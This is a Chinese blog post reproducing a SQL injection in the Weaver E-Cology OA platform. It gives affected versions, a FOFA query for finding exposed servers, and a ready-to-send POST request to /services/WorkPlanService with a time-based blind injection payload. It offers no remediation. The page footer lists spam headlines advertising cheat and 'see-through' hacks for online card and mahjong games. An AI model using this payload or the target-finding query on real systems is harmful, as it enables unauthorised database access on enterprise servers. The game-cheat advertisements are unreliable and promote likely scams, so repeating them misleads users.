漏洞复现-F6-11泛微-E-Cology-SQL
创始人
2024-11-22 04:05:23
0

本文来自无问社区,更多漏洞信息可前往查看icon-default.png?t=N7T8http://www.wwlib.cn/index.php/artread/artid/15575.html

0x01 产品简介

泛微协同管理应用平台e-cology是一套企业级大型协同管理平台

0x02 漏洞概述

该漏洞是由于泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现 SQL 注入漏洞。

影响范围:泛微E-Cology9 < 10.65.0

0x03 复现环境

FOFO:app="泛微-OA(e-cology)"

POC

延时5秒
payload:

POST /services/WorkPlanService HTTP/1.1 HOST:  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 Content-Type: text/xml;charset=UTF-8 Connection: close                                          (SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)                    22

效果图:
 

图片

上一篇:苹果8为什么字拉不上去

下一篇:常州网站推广_网站推广(SEO设置)

相关内容

热门资讯

透视透视挂!wepoker怎么... 透视透视挂!wepoker怎么开辅助,哈糖大菠萝怎么开挂,绝活教程(本来有挂)-哔哩哔哩1、实时哈糖...
免费测试版!九九联盟解码器(辅... 免费测试版!九九联盟解码器(辅助挂)开挂透视辅助攻略(真是是有挂)-哔哩哔哩1、任何九九联盟解码器a...
截至目前!约战沙城辅助脚本,微... 截至目前!约战沙城辅助脚本,微信小程序雀神挂件,AI教程(切实有挂)-哔哩哔哩1、完成微信小程序雀神...
第九分钟策略!小闲川南宜宾辅助... 第九分钟策略!小闲川南宜宾辅助,决战卡五星辅助软件,微扑克教程(存在有挂)-哔哩哔哩在进入决战卡五星...
透视能赢!德普之星私人局辅助器... 透视能赢!德普之星私人局辅助器,pokerworld辅助器,手筋教程(都是真的是有挂)-哔哩哔哩1、...
盘点几款!新老夫子免费辅助(辅... 盘点几款!新老夫子免费辅助(辅助挂)开挂透视辅助插件(真是存在有挂)-哔哩哔哩1、在新老夫子免费辅助...
有了最新消息!星悦游戏辅助官网... 有了最新消息!星悦游戏辅助官网,决战卡五星辅助,揭秘攻略(一直是有挂)-哔哩哔哩1、首先打开星悦游戏...
第八分钟窍要!推筒子压桩公式规... 第八分钟窍要!推筒子压桩公式规律,新道游辅助软件下载,技巧教程(存在有挂)-哔哩哔哩1、让任何用户在...
透视透视!we poker辅助... 透视透视!we poker辅助器v3.3,aapoker公共底牌,经验教程(都是真的有挂)-哔哩哔哩...
玩家必备教程!嘟咪互动修改器(... 玩家必备教程!嘟咪互动修改器(辅助挂)开挂透视辅助教程(其实是有挂)-哔哩哔哩1、很好的工具软件,可...